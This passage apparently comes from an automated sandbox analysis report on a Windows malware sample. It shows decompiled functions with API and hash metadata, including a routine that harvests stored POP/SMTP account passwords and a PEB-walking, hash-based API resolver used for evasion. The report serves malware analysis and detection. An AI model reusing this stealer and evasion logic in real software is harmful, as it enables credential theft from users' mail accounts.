                                              Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: closesocket
                                              • String ID:
                                              • API String ID: 2781271927-0
                                              • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                              • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                              • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                              0x00403fac
                                              0x00403fba
                                              0x00403fbe

                                              APIs
                                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                              • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                              • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                              0x0040647f
                                              0x00406487
                                              0x0040648a

                                              APIs
                                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                              • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                              • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                              0x004058f8
                                              0x00405903
                                              0x00405906

                                              APIs
                                              • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                              • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                              • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                              0x00405932
                                              0x0040593d
                                              0x00405940

                                              APIs
                                              • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                              • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                              • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040438F
                                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                              • VariantInit.OLEAUT32(?), ref: 004043C4
                                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                                              • VariantInit.OLEAUT32(?), ref: 00404414
                                              • SysAllocString.OLEAUT32(?), ref: 00404419
                                              • VariantInit.OLEAUT32(?), ref: 00404431
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                                              • String ID:
                                              • API String ID: 1312198159-0
                                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                              0x0040d070
                                              0x0040d080
                                              0x0040d084
                                              0x0040d086
                                              0x0040d08c
                                              0x0040d0a0
                                              0x0040d0ae
                                              0x0040d0bd
                                              0x0040d0c0
                                              0x0040d0c5
                                              0x0040d0c9
                                              0x0040d0e3
                                              0x0040d0f2
                                              0x0040d101
                                              0x0040d104
                                              0x0040d109
                                              0x0040d110
                                              0x0040d11e
                                              0x0040d123
                                              0x0040d126
                                              0x0040d12d
                                              0x0040d145
                                              0x0040d154
                                              0x0040d15a
                                              0x0040d166
                                              0x0040d174
                                              0x0040d186
                                              0x0040d18e
                                              0x0040d19a
                                              0x0040d1ac
                                              0x0040d1ba
                                              0x0040d1cc
                                              0x0040d1d1
                                              0x0040d1dd
                                              0x0040d1e2
                                              0x0040d1e7
                                              0x0040d1e7
                                              0x0040d1e7
                                              0x0040d1eb
                                              0x0040d1f1
                                              0x0040d1f7
                                              0x0040d1ff
                                              0x0040d207
                                              0x0040d20f
                                              0x0040d217
                                              0x0040d21f
                                              0x0040d227
                                              0x0040d230

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                              • API String ID: 0-2111798378
                                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                              0x0040317f
                                              0x00403180
                                              0x00403180
                                              0x00403180
                                              0x0040318d
                                              0x00403196
                                              0x00403199
                                              0x0040319b
                                              0x004031a1
                                              0x004031a9
                                              0x004031ab
                                              0x004031ac
                                              0x004031ae
                                              0x00000000
                                              0x004031b0
                                              0x004031b3
                                              0x004031c2
                                              0x004031c7
                                              0x004031cd
                                              0x004031e0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004031cd
                                              0x004031d7
                                              0x004031dd
                                              0x004031cf
                                              0x004031cf
                                              0x004031d1
                                              0x004031d5
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                              Uniqueness

                                              Uniqueness Score: -1.00%